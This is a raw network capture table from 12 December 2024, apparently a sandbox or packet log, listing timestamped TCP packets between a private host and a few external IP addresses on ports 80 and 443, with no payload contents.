Dec 12, 2024 16:48:30.923998117 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.932188034 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.932241917 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.935270071 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.935331106 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.935410976 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.935456991 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.943831921 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.943890095 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.943939924 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.943985939 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.952301025 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.952352047 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.952378035 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.952420950 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.960508108 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.960563898 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.960638046 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.960688114 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.968903065 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.968952894 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.968954086 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.968991041 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.977255106 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.977307081 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.977385998 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.977433920 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.985807896 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.985866070 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.985915899 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.985959053 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.993413925 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.993473053 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.993518114 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.993560076 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.001039028 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.001060963 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.001091003 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.001108885 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.040371895 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.040432930 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.111764908 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.111836910 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.111860991 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.111977100 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.113995075 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.114042997 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.114886045 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.114940882 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.114989042 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.115037918 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.119856119 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.119905949 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.119992971 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.120033026 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.124522924 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.124568939 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.124619007 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.124664068 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.129322052 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.129380941 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.129381895 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.129429102 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.134023905 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.134067059 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.134113073 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.134161949 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.138540030 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.138586998 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.138626099 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.138669014 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.143146992 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.143194914 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.143290997 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.143349886 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.147787094 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.147831917 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.147878885 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.147931099 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.152347088 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.152390003 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.152404070 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.152427912 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.156826019 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.156898022 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.156917095 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.156960011 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.161482096 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.161539078 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.161549091 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.161587000 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.165872097 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.165956020 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.166014910 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.166058064 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.170443058 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.170542002 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.170614004 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.174501896 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.174746990 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.174817085 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.178251982 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.178333998 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.178397894 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.181452036 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.181540012 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.181607008 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.185126066 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.185185909 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.185236931 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.188855886 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.188869953 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.188929081 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.192450047 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.192578077 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.192629099 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.196093082 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.196181059 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.196320057 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.199726105 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.199906111 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.199956894 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.231806040 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.232012987 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.232105017 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.233587980 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.233639956 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.303719044 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.303941011 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.304044962 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.304114103 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.305042028 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.305098057 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.305602074 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.305675983 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.305720091 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.305768013 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.308548927 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.308604956 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.308613062 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.308660984 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.311410904 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.311469078 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.311474085 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.311525106 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.314049959 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.314110994 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.314162016 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.314209938 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.316823006 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.316884041 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.317011118 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.317055941 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.319677114 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.319739103 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.319803953 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.319849968 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.322093964 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.322158098 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.322213888 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.322261095 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.324738979 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.324805975 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.324832916 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.324877024 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.327153921 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.327207088 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.327267885 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.327316999 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.329936981 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.329998970 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.330074072 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.330125093 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.332142115 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.332194090 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.332264900 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.332309961 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.334666967 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.334737062 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.334774017 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.334822893 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.337203979 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.337256908 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.337327957 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.337373018 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.339667082 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.339721918 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.339757919 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.339807987 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.342392921 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.342464924 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.342557907 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.342607975 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.344664097 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.344696045 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.344744921 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.344768047 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.347135067 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.347197056 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.347248077 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.347292900 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.349586010 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.349644899 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.349720955 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.349761963 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.352068901 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.352144957 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.352173090 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.352190971 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.355031013 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.355285883 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.355353117 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.357671976 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.357810974 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.357894897 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.359590054 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.359641075 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.359671116 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.359714031 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.361186028 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.361234903 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.361279964 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.361320019 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.362579107 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.362694979 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.362742901 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.364456892 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.364470959 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.364507914 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.364521980 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.366337061 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.366455078 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.366513968 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.368159056 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.368248940 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.368315935 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.369858980 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.370043993 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.370059013 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.370100021 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.371793032 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.371834993 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.371977091 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.372025013 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.373735905 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.373783112 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.373867989 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.375623941 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.376050949 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.376065969 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.376099110 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.376111031 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.377398968 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.377614975 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.377629995 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.377675056 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.379095078 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.379141092 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.379184961 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.379250050 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.380913019 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.380997896 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.381050110 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.382719994 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.382797956 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.382843971 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.384557009 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.384668112 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.384730101 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.386394978 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.386466980 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.386482000 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.386523962 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.388155937 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.388214111 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.421745062 CET	443	49917	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:31.421825886 CET	49917	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:31.427690029 CET	49917	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:31.427727938 CET	443	49917	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:31.428073883 CET	443	49917	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:31.431333065 CET	49917	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:31.432183027 CET	49917	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:31.453572989 CET	443	49916	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:31.453644991 CET	49916	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:31.460011959 CET	49916	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:31.460036039 CET	443	49916	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:31.460267067 CET	443	49916	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:31.460319042 CET	49916	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:31.460692883 CET	49916	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:31.479330063 CET	443	49917	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:31.495907068 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.496016979 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.496078968 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.496597052 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.496649027 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.496815920 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.496861935 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.498178959 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.498246908 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.498745918 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.498795986 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.498843908 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.498889923 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.500416040 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.500556946 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.500663996 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.501859903 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.501920938 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.501928091 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.502011061 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.503329992 CET	443	49916	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:31.503402948 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.503458023 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.503499031 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.503544092 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.504803896 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.504849911 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.504883051 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.504923105 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.506468058 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.506511927 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.506546021 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.506587982 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.507816076 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.507862091 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.507971048 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.508138895 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.509160042 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.509211063 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.509217978 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.509279013 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.510596991 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.510644913 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.510653019 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.510696888 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.511892080 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.511935949 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.511970997 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.512011051 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.513261080 CET	80	49912	31.41.244.11	192.168.2.10
